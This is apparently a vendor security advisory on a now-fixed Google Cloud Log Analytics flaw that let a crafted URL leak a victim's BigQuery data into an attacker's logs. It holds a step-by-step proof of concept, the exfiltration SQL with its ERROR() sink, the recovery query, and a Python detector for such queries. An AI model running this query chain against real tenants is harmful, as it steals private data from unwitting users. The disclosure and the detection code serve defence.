
Google Cloud Platform (GCP) Cloud Logging Cross-Tenant BigQuery Leak with Log Analytics

High

Synopsis

Tenable Research has identified and responsibly disclosed a data exfiltration vulnerability in Google Cloud Logging. This flaw allowed an attacker to exfiltrate data from a victim's BigQuery datasets by visiting a maliciously crafted Cloud Logging URL.


When a user navigates to a Log Analytics URL, the SQL query embedded in that URL is submitted automatically, even when the query is set to use the BigQuery engine. An attacker could exploit this behavior by granting the victim's principal BigQuery permissions in the attacker's project and crafting a malicious URL containing a JOIN query that links a log view in the attacker's project to a sensitive dataset in the victim's project. Because the query is executed in the context of the user viewing the page, it runs with the victim's permissions. The attacker can therefore build a URL for a Log Analytics query that runs in the attacker's own project but surfaces the contents of the victim's dataset as a SQL error message. When the victim browses to the URL, their private BigQuery data is written to the attacker's project logs as that error, where the attacker can read it.


Proof of Concept:

  1. Make sure that Log Analytics is active with a reservation, and that at least one log view with a linked BigQuery dataset is available
  2. Give the victim’s principal IAM permissions in the attacker’s tenant
  3. Browse to Log Analytics
  4. Click '<> SQL' to change the query builder into SQL mode
  5. Click the settings cog icon, and select the BigQuery engine
  6. Run any legitimate query
  7. Copy the URL, and replace the legitimate query with a malicious query:

SELECT
  ERROR(CONCAT('EXFIL: ', TO_BASE64(
    CAST(
      TO_JSON_STRING(ARRAY_AGG(t)) AS BYTES
    )
  )))
FROM (
  SELECT t
  FROM
    `[ATTACKER_PROJECT].global._Default._AllLogs` AS l
    CROSS JOIN `[VICTIM_PROJECT].[VICTIM_DATASET].[VICTIM_TABLE]` AS t
  LIMIT 1 OFFSET 0
);

  8. Get the victim to browse to the new malicious URL, which will run the query automatically
  9. Once the victim has browsed to the URL, query the logs to view the exfiltrated data:

SELECT
  CAST(
    FROM_BASE64(
      REGEXP_EXTRACT(
        proto_payload.audit_log.status.message, r'^EXFIL:\s+([A-Za-z0-9+/=]+)'
      )
    ) AS STRING
  )
FROM
  `[ATTACKER_PROJECT].global._Default._AllLogs`
WHERE severity = "ERROR" AND starts_with(proto_payload.audit_log.status.message, 'EXFIL')
ORDER BY timestamp DESC

Solution

Google has resolved the issue by no longer running Log Analytics queries automatically when the page loads. Queries that involve resources which do not share an ownership boundary now display a warning asking the user to check that the query is safe, and the user must manually start the query, including in charts, once they have confirmed it.
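As an added illustration of the ownership-boundary check described in the Solution, and of the cross-project JOIN pattern described in the Synopsis: the Python below is example code written for this advisory's readers, not Google's implementation, and it assumes the SQL text has already been extracted from the Log Analytics URL. It pulls the project IDs out of fully qualified, backtick-quoted table references in a query, flags any project that differs from the one hosting the page, and separately flags an ERROR(...) call, which is the sink the PoC uses to carry rows out inside an error message. Project names in the sample queries are constructed placeholders.

```python
"""Added example (not Google's code): a simplified ownership-boundary check
for a Log Analytics SQL query before it is allowed to auto-run."""
import re
from dataclasses import dataclass, field

# Fully qualified, backtick-quoted BigQuery references, e.g.
# `my-project.my_dataset.my_table` or `my-project.global._Default._AllLogs`.
# Bracketed placeholders are allowed so the advisory's own PoC text can be checked.
TABLE_REF = re.compile(r"`([A-Za-z0-9_\-\[\].]+)`")

# ERROR(...) with a computed argument is how the PoC smuggles rows into an
# error message that lands in the attacker's project logs. Treat it as a sink.
ERROR_SINK = re.compile(r"\bERROR\s*\(", re.IGNORECASE)


@dataclass
class QueryCheck:
    home_project: str
    referenced_projects: set = field(default_factory=set)
    foreign_projects: set = field(default_factory=set)
    uses_error_sink: bool = False

    @property
    def crosses_ownership_boundary(self) -> bool:
        return bool(self.foreign_projects)

    @property
    def safe_to_autorun(self) -> bool:
        # Mirrors the post-fix behaviour the advisory describes: only queries whose
        # resources share one ownership boundary may run without a user click.
        return not self.crosses_ownership_boundary


def referenced_projects(sql: str) -> set:
    """Project IDs named by fully qualified table references in the query."""
    projects = set()
    for ref in TABLE_REF.findall(sql):
        parts = ref.split(".")
        if len(parts) >= 3:  # project.dataset.table (Log Analytics views have 4 parts)
            projects.add(parts[0])
    return projects


def check_query(sql: str, home_project: str) -> QueryCheck:
    """Classify a query relative to the project whose Log Analytics page hosts it."""
    refs = referenced_projects(sql)
    return QueryCheck(
        home_project=home_project,
        referenced_projects=refs,
        foreign_projects={p for p in refs if p != home_project},
        uses_error_sink=bool(ERROR_SINK.search(sql)),
    )


# Constructed sample queries; the project names are placeholders, not real projects.
BENIGN_QUERY = """
SELECT timestamp, severity
FROM `attacker-project.global._Default._AllLogs`
LIMIT 10
"""

CROSS_TENANT_QUERY = """
SELECT ERROR(CONCAT('EXFIL: ', TO_BASE64(CAST(TO_JSON_STRING(ARRAY_AGG(t)) AS BYTES))))
FROM (
  SELECT t
  FROM `attacker-project.global._Default._AllLogs` AS l
  CROSS JOIN `victim-project.sensitive_dataset.customers` AS t
  LIMIT 1 OFFSET 0
)
"""

if __name__ == "__main__":
    for name, sql in (("benign", BENIGN_QUERY), ("cross-tenant", CROSS_TENANT_QUERY)):
        c = check_query(sql, home_project="attacker-project")
        print(f"{name}: foreign projects={sorted(c.foreign_projects)} "
              f"error sink={c.uses_error_sink} auto-run ok={c.safe_to_autorun}")
```

The check is deliberately syntactic: it does not resolve IAM or dataset ownership, so a production version would map each project ID to its organization or billing account before deciding what "shares an ownership boundary" means. The ERROR() flag is a second, independent signal worth surfacing in the warning text, since a query that both spans projects and funnels aggregated rows into an error is exactly the shape of the PoC above.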

Disclosure Timeline

November 16, 2025 - Tenable reports the finding to Google, and Google acknowledges
November 25, 2025 - Google accepts the bug and assigns an S1 severity
December 14, 2025 - Tenable requests an update
December 16, 2025 - Google awards a bounty
December 17, 2025 - Tenable acknowledges
December 18, 2025 - Google informs they will share updates about the fix and ETA when available
January 4, 2026 - Tenable requests an update
January 7, 2026 - Google updates that product teams are still working on a mitigation
January 22, 2026 - Google updates that the fix is rolling out, Tenable acknowledges and requests additional details regarding the fix
January 26, 2026 - Google provides details regarding the fix
January 28, 2026 - Google updates the status of the issue to fixed

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]